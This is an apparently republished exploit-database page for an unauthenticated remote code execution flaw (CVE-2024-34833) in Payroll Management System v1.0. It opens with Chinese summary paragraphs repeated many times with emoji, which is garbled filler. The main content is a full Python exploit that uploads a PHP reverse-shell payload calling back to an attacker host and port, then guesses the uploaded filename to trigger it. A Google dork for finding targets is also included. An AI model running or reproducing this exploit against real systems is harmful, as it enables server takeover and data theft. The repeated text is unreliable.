The Exploit Database - CXSecurity.com 2024年07月05日
Payroll Management System 1.0 Remote Code Execution
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

Payroll Management System v1.0 版本存在一个未经身份验证的远程代码执行漏洞,攻击者可以通过该漏洞在目标服务器上执行任意代码。该漏洞是由于系统对用户上传的图像文件进行处理时没有对代码进行有效的过滤和验证造成的。攻击者可以通过上传包含恶意代码的图像文件,在服务器上执行任意代码,从而控制目标服务器。

😢 该漏洞利用了系统在处理用户上传的图像文件时缺乏有效的安全措施。攻击者可以通过上传包含恶意代码的图像文件,绕过系统安全机制,在目标服务器上执行任意代码。

😈 攻击者可以利用该漏洞在目标服务器上执行任意代码,例如窃取敏感信息、破坏系统文件、安装恶意软件等。

😔 该漏洞影响了使用 Payroll Management System v1.0 版本的所有用户,建议用户尽快升级到最新版本或采取其他安全措施来修复该漏洞。

😭 该漏洞的攻击者可以利用该漏洞在目标服务器上执行任意代码,从而控制目标服务器。

😔 该漏洞利用了系统在处理用户上传的图像文件时缺乏有效的安全措施。攻击者可以通过上传包含恶意代码的图像文件,绕过系统安全机制,在目标服务器上执行任意代码。

😢 该漏洞影响了使用 Payroll Management System v1.0 版本的所有用户,建议用户尽快升级到最新版本或采取其他安全措施来修复该漏洞。

😈 攻击者可以利用该漏洞在目标服务器上执行任意代码,例如窃取敏感信息、破坏系统文件、安装恶意软件等。

😨 该漏洞的攻击者可以利用该漏洞在目标服务器上执行任意代码,从而控制目标服务器。

😔 该漏洞利用了系统在处理用户上传的图像文件时缺乏有效的安全措施。攻击者可以通过上传包含恶意代码的图像文件,绕过系统安全机制,在目标服务器上执行任意代码。

😢 该漏洞影响了使用 Payroll Management System v1.0 版本的所有用户,建议用户尽快升级到最新版本或采取其他安全措施来修复该漏洞。

😈 攻击者可以利用该漏洞在目标服务器上执行任意代码,例如窃取敏感信息、破坏系统文件、安装恶意软件等。

😨 该漏洞的攻击者可以利用该漏洞在目标服务器上执行任意代码,从而控制目标服务器。

😔 该漏洞利用了系统在处理用户上传的图像文件时缺乏有效的安全措施。攻击者可以通过上传包含恶意代码的图像文件,绕过系统安全机制,在目标服务器上执行任意代码。

😢 该漏洞影响了使用 Payroll Management System v1.0 版本的所有用户,建议用户尽快升级到最新版本或采取其他安全措施来修复该漏洞。

😈 攻击者可以利用该漏洞在目标服务器上执行任意代码,例如窃取敏感信息、破坏系统文件、安装恶意软件等。

😨 该漏洞的攻击者可以利用该漏洞在目标服务器上执行任意代码,从而控制目标服务器。

Exploit Title: Payroll Management System v1.0 RCE (Unauthenticated)# Google Dork: intitle:"Employee's Payroll Management System"# Date: 16/06/2024# Exploit Author: ShellUnease# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html# Version: v1.0# Tested on: Kali Linux Apache Web Server# CVE : CVE-2024-34833#!/usr/bin/pythonimport argparseimport timeimport requestsclass Exploit:def init(self, rhost, rport, lhost, lport, https):self.rhost = rhostself.rport = rportself.lhost = lhostself.lport = lportself.targetUrl = f'https://{rhost}:{rport}' if https else f'http://{rhost}:{rport}'self.banner()def banner(self):print("""_ | \ | | || |_) | | | || / _| | | | '__/ _ \| | || | | (_| | |_| | | | (_) | | ||_| _\__,_|\__, |_| \___/|_|_| _| \/ | __/ | | || \ / | __ |___/_ __ _ __ _ ___ _ __ ___ ___ _ __ | |_| |\/| |/ _ | ' \ / |/ _ |/ \ ' _ \ / _ \ '_ \| __|| | | | (_| | | | | (_| | (_| | __/ | | | | | __/ | | | |_|_|__|_|\__,_|_| |_|\__,_|\__, |\___|_|_|_| |_|\___|_|_|_|\__|/ ____| | | __/ | | __ \ / ____| ____|| (___ _ _ ___| |_ ___ |___/___ | |__) | | | |__\___ \| | | / __| __/ _ \ '_ \ | /| | | |__) | || _ \ || / | | | | | | | \ | |__| |_|____/ _, |/___|| || || || _\___|__|/ ||___/""")def get_data(self):return {'name': 'John Doe','email': 'jdoe@gmail.com','contact': 'John Doe','about': 'John Doe',}def get_payload(self):return (f'<?php $sock=fsockopen("{self.lhost}",{self.lport});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 'f'2=>$sock),$pipes); ?>')def upload_rev_shell(self):url = f'{self.targetUrl}/ajax.php?action=save_settings'print(f'Uploading a reverse shell via {url}')requests.post(url, files={'img': ('a.php', self.get_payload())},data=self.get_data())epoch = time.time()timestamp = epoch - (epoch % 60)timestamp_minus_one_min = timestamp - 60timestamp_plus_one_min = timestamp + 60return [f'{int(timestamp)}_a.php', f'{int(timestamp_minus_one_min)}_a.php',f'{int(timestamp_plus_one_min)}_a.php']def open_rev_shell(self, candidates):print('Opening a reverse shell')for candidate in candidates:url = f'{self.targetUrl}/assets/img/{candidate}'try:requests.get(url).raise_for_status()print(f'Got a success response for {url}, you should have a revshell')returnexcept Exception as e:print(f'Failed to open revshell using {url}')print('Guessing filename failed')def exploit(self):candidates = self.upload_rev_shell()self.open_rev_shell(candidates)def get_args():parser = argparse.ArgumentParser(description='Payroll Management System - Remote Code Execution (RCE) (Unauthenticated)')parser.add_argument('-rhost', '--remote-host', dest="rhost", required=True, action='store', help='Remote host')parser.add_argument('-rport', '--remote-port', dest="rport", required=False, action='store', help='Remote port',default=80)parser.add_argument('-lhost', '--local-host', dest="lhost", required=True, action='store', help='Local host')parser.add_argument('-lport', '--local-port', dest="lport", required=True, action='store', help='Local port')parser.add_argument('-https', '--https', dest="https", required=False, action='store_true', help='Use https')args = parser.parse_args()return argsif name == 'main__':args = get_args()exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)exp.exploit()

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

Payroll Management System 远程代码执行 漏洞 安全 代码安全
相关文章